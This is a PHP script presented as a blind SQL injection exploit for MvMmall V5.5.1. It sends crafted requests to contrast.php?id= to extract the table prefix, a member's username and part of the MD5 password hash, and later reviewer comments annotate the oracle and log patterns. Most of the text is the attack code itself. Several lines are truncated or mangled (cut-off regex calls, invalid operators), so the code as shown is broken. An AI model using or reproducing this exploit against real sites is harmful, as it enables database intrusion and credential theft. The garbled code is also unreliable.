
MvMmall_V5.5.1 Blind SQL Injection Exploit


利用代码如下:

< ?php
// Script-wide setup. The time limit is lifted because the probing loops below
// issue one HTTP request per candidate value.
ini_set("max_execution_time",0);
// 7 == E_ERROR | E_WARNING | E_PARSE: notices (e.g. undefined variables) are silenced.
error_reporting(7);

// Exactly three positional arguments are required: host, web path, target uid.
// usage() prints the banner and exits, so execution only continues with $argc == 4.
if ($argc != 4)
usage ();
$hostname = $argv [1];
$path = $argv [2];
$userid = $argv [3];
// Default table prefix; the main script later replaces it with the value it
// extracts from the server's response.
$prefix = "mvm_";
//$key = "abcdefghijklmnopqrstuvwxyz0123456789";
// Cursor state shared with the main loops: 1-based character position and
// index into the candidate alphabet.
$pos = 1;
$chr = 0;

// Prints the tool banner with the invocation form and terminates the script.
// Reads the script name from the global $argv; never returns.
function usage ()
{
global $argv;
$script = $argv[0];
$banner = "\n[+] MvMmall_V5.5.1 Blind SQL Injection Exploit"
    . "\n[+] Author: My5t3ry"
    . "\n[+] Site : http://hi.baidu.com/netstart"
    . "\n[+] Usage : php {$script} "
    . "\n[+] Ex. : php {$script} localhost /shop 1"
    . "\n\n";
echo $banner;
exit ();
}

// Sends one unauthenticated HTTP/1.1 GET for {$path}/contrast.php?id={$query}
// to port 80 of $hostname and returns the raw response (status line, headers
// and body) as a single string.
// The id parameter of contrast.php is the single injection point every probe in
// this script goes through. On the defending side, requests to contrast.php whose
// id value is not a plain integer (the probes here all start with "-1)") are the
// pattern to look for in access logs.
function request ($hostname, $path, $query)
{
$fp = fsockopen ($hostname, 80);

if (!$fp) {
// NOTE(review): $host is never assigned in this scope, so the name printed here is empty
// (the notice is hidden by error_reporting(7) at the top of the file).
echo 'No response from '.$host; die;
}

// $query is inserted verbatim; the callers percent-encode spaces and quotes beforehand.
$request = "GET {$path}/contrast.php?id={$query} HTTP/1.1\r\n".
"Host: {$hostname}\r\n".
"Connection: Close\r\n\r\n";

fputs ($fp, $request);

// Read until the server closes the connection (requested via "Connection: Close").
// NOTE(review): $reply is not initialised before the first .=, which relies on the
// suppressed-notice setting above.
while (!feof ($fp))
$reply .= fgets ($fp, 1024);

fclose ($fp);
return $reply;
}

// Finds the length of member_id for the given uid with a boolean-blind oracle:
// probes length(...)=$i for i = 0, 1, 2, ... and stops at the first value for
// which the page renders a product link (a non-empty title="..." capture).
// Reads $hostname and $path from globals, echoes the result and returns it.
// The die() in the loop presumably caps the search at about 30 probes.
function lengthcolumns ($userid, $prefix)
{
global $path,$hostname;
$exit=0;
$length=0;
$i=0;
while ($exit==0)
{
// Probe shape: "-1) Or <condition>%23" — closes the original parenthesis, ORs the
// condition in, and comments out the remainder of the statement with '#'.
$query = "-1) Or length((select member_id from ".$prefix."member_table Where uid={$userid}))=".$i."%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

$i++;

// NOTE(review): this line is cut off in this copy of the script (the rest of the
// pattern and the $reply/$x arguments are missing — presumably lost at a '<' during
// extraction), so as written $x is never assigned.
preg_match ("/target=\"_blank\" title=\"(.+)\">

// NOTE(review): "$i/>30" is not valid PHP; presumably "$i>30" before the copy was mangled.
if ($i/>30) {die(" Exploit failed...");}

//echo $x [1];

// Oracle: an empty capture means the injected condition was false -> keep probing.
if (strlen (trim ($x [1])) == 0)
$exit=0;
else
$exit=1;
}

// $i was incremented after the matching probe, hence the -1.
$length=$i-1;

echo "[+]length -> ".$length;

return $length;
}

// One boolean-blind probe: returns true when the character at 1-based position
// $pos of column $fld (the callers pass member_id and member_pass) for the given
// uid has the ASCII code of $chr, false otherwise. Uses the same page oracle as
// lengthcolumns(): a non-empty title="..." capture in the response means the
// injected condition held. Reads the table prefix from the global $prefix.
function exploit ($hostname, $path, $userid, $fld, $chr, $pos)
{
global $prefix;

// The parameter is reused to hold the numeric code compared in the query.
$chr = ord ($chr);

$query = "-1) Or ASCII(SUBSTRING((SELECT {$fld} FROM ".$prefix."member_table WHERE uid={$userid}),{$pos},1))={$chr}%23";

$query = str_replace (" ", "%20", $query);

$query = str_replace ("'", "%27", $query);

$reply = request ($hostname, $path, $query);

// NOTE(review): cut off in this copy of the script (pattern end and the $reply/$x
// arguments are missing), so as written $x is never assigned.
preg_match ("/target=\"_blank\" title=\"(.+)\">

if (strlen (trim ($x [1])) == 0)
return false;
else
return true;
}

echo "\n-------------------------------------------------------------------------------\n\n";
echo " MvMmall_V5.5.1 Blind SQL Injection Exploit\n";
echo " By My5t3ry (http://hi.baidu.com/netstart)\n";
echo "\n-------------------------------------------------------------------------------\n\n";
echo "[~]Trying to get pre...\n";

// Step 1: learn the table prefix. "-1))%23" leaves an unbalanced parenthesis so the
// statement fails; the regex below then expects the failing SQL ("FROM `<prefix>goods_table")
// to be echoed back in the response body. This step only yields anything when database
// errors are rendered to the client — not showing SQL errors on the page removes its
// information source.
$query = "-1))%23";

$reply = request ($hostname, $path, $query);

// NOTE(review): the 'e' modifier was a preg_replace eval flag and was removed in PHP 7;
// on current PHP this call is expected to be rejected with a warning, leaving $match
// unset — confirm against the PHP version in use.
preg_match('/FROM `(.+)goods_table/ie',$reply,$match);

$prefix=$match[1];

// NOTE(review): "-/>" in the message is presumably "->" mangled in this copy.
if ($match[1]){echo "[+]Good Job!Wo Got The pre -/> ".$match[1]."\n";}else{die(" Exploit failed...");}

echo "[~]Trying to get username length...\n";

// Step 2: number of characters in member_id, via the length oracle.
$length = lengthcolumns($userid, $prefix);

echo "\n[~]Trying to Crack...";
echo "\n[+]username -> ";

// Step 3: recover member_id one position at a time. Each character of $key is tried
// in turn; on a hit it is printed, the position advances and $chr is reset ($chr = -1
// followed by the $chr++ below restarts at index 0). There is no guard for a position
// that matches nothing in $key: $chr then grows past the end of the 36-character alphabet.
// NOTE(review): "< =" is "<=" split in this copy.
while ($pos < = $length)
{
$key = "abcdefghijklmnopqrstuvwxyz0123456789";

if (exploit ($hostname, $path, $userid, "member_id", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

// Step 4: positions 9..24 of member_pass with a hexadecimal alphabet, i.e. a 16-character
// slice of what the label below calls an md5 value. Same loop shape, same missing guard,
// and $chr carries over from the loop above rather than being reset.
$pos = 9;

echo "\n[+]password(md5) -> ";

while ($pos < = 24)
{
$key = "abcdef0123456789";

if (exploit ($hostname, $path, $userid, "member_pass", $key [$chr], $pos))
{
echo $key [$chr];
$chr = -1;
$pos++;
}
$chr++;
}

echo "\n[+]Done!";
echo "\n\n-------------------------------------------------------------------------------";
?>
